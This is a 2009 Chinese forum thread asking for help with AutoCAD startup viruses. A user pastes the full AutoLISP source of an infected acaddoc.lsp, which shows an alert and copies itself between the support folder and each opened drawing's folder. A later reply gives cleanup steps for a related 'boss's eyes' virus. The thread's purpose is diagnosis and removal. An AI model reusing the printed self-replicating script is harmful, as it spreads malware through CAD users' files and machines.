joelei 发表于 2009-12-14 16:42:00

求助!病毒“要认认真真工作哦”

<p>最近开机碰到这个病毒,和以前的“党不会亏待你的!”病毒相似;</p><p>还有一个现象就是,修改块的X,Y,Z比例,无法修改了</p><p>有没有高手,能搞定一下啊?</p>

joelei 发表于 2009-12-14 16:54:00

<p>查了一下工作目录 会生成acaddoc.lsp文件</p><p>内容如下:</p><p></p><p>(defun-q s::startup<br/>&nbsp; (/ basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp; baseacad<br/>&nbsp;&nbsp;&nbsp;&nbsp; acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp; r-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp; w-basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp; rl-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp; acaddoclsp<br/>&nbsp;&nbsp;&nbsp;&nbsp; c-acaddocname<br/>&nbsp;&nbsp;&nbsp;&nbsp; c-acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp; c-acaddoc<br/>&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp; (setq basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp; (findfile "base.dcl")<br/>&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp; (setq basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp; (substr basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 (- (strlen basepath) 8)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp; (setq baseacad (strcat basepath "acaddoc.lsp"))<br/>&nbsp; <br/>&nbsp;(setq acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (findfile "acaddoc.lsp")<br/>&nbsp;)<br/>&nbsp;(setq acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (substr acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 (- (strlen acaddocpath) 11)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;)<br/>&nbsp;(setq acaddoclsp<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (strcat acaddocpath "acaddoc.lsp"))<br/>&nbsp;<br/>&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq c-acaddocname<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (getvar "dwgname")<br/>&nbsp;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq c-acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (findfile c-acaddocname)<br/>&nbsp;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq c-acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (substr c-acaddocpath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 (- (strlen c-acaddocpath) (strlen c-acaddocname))&nbsp;<br/>&nbsp;&nbsp;)<br/>&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq c-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (strcat c-acaddocpath "acaddoc.lsp")<br/>&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (alert "要认认真真工作哦!!")<br/>&nbsp; (if<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (and<br/>&nbsp;&nbsp;&nbsp; (/= basepath acaddocpath)<br/>&nbsp;&nbsp;&nbsp; (= c-acaddocpath acaddocpath)<br/>&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (progn<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq r-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (open acaddoclsp "r")<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq w-basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (open baseacad "w")<br/>&nbsp;&nbsp;)&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (while<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq rl-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (read-line r-acaddoc)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (write-line rl-acaddoc w-basepath)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (close w-basepath)&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (close r-acaddoc)<br/>&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (progn<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq r-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (open acaddoclsp "r")<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq w-basepath<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (open c-acaddoc "w")<br/>&nbsp;&nbsp;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (while<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (setq rl-acaddoc<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (read-line r-acaddoc)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (write-line rl-acaddoc w-basepath)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (close w-basepath)&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (close r-acaddoc)<br/>&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br/>&nbsp; )<br/>&nbsp; (princ)<br/>)<br/></p>

xiaoyaobest 发表于 2009-12-16 23:51:00

<p>还是这个acad.lsp,没新意。有时间多写点有意义的东西或者玩点高级的,老玩这种低级的东西,没劲</p>

lzh1600 发表于 2009-12-20 01:30:00

<p>用AutoCAD的朋友可能都遇到过“老板的眼睛是雪亮的”病毒,这种病毒的主要症状是,在AutoCAD每次启动时及在画图过程中,隔一段时间就提醒你已经工作了多长时间,还有“老板的眼睛是雪亮的”之类的话,很烦人,并且影响CAD的运行速度。</p><p>该病毒发作后的主要表现为:</p><p>1、病毒在启动CAD时会弹出一个显示时间并写有“老板的眼睛是雪亮的”的对话框;</p><p align="left"><span><img class="blogimg" src="http://hiphotos.baidu.com/lzh1600/pic/item/ba7b5008f6fa1d2f94ca6b53.jpg" border="0" complete="complete" small="0" alt=""/><br/></span></p><p>2、病毒在8:00至18:00这个段时间内,对CAD画图没有任何的影响。当时间不在8:00至18:00之间时,会弹出如下对话框,可能伴随“移动”命令改变~等情况。</p><p><img class="blogimg" src="http://hiphotos.baidu.com/lzh1600/pic/item/86511519ea6623e5ac6e7571.jpg" border="0" complete="complete" small="0" alt=""/><br/></p><p><font size="3">我的一个同事在网上查到了病毒作者的博客中的一篇文章,说他是无意中写了这个病毒,本想和同事开个玩笑,没想到传了出去对大家造成伤害,并给出了解决方法如下:</font></p><p><font size="3">方法一、启动AutoCAD,在命令行中输入以下语句:</font></p><p><font size="3">(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) </font></p><p><font size="3">回车后关闭AutoCAD,重新启动AutoCAD后你就会发现一切都正常了。</font></p><p><font size="3">方法二:关闭AutoCAD,搜索并删除电脑中的acad.fas和lcm.fas文件,注意“搜索范围”一定要选择你本地硬盘的所有分区,搜索时<font color="#000000">一定要先勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将病毒文件全部搜索清除干净。</font></font></p>
页: [1]
查看完整版本: 求助!病毒“要认认真真工作哦”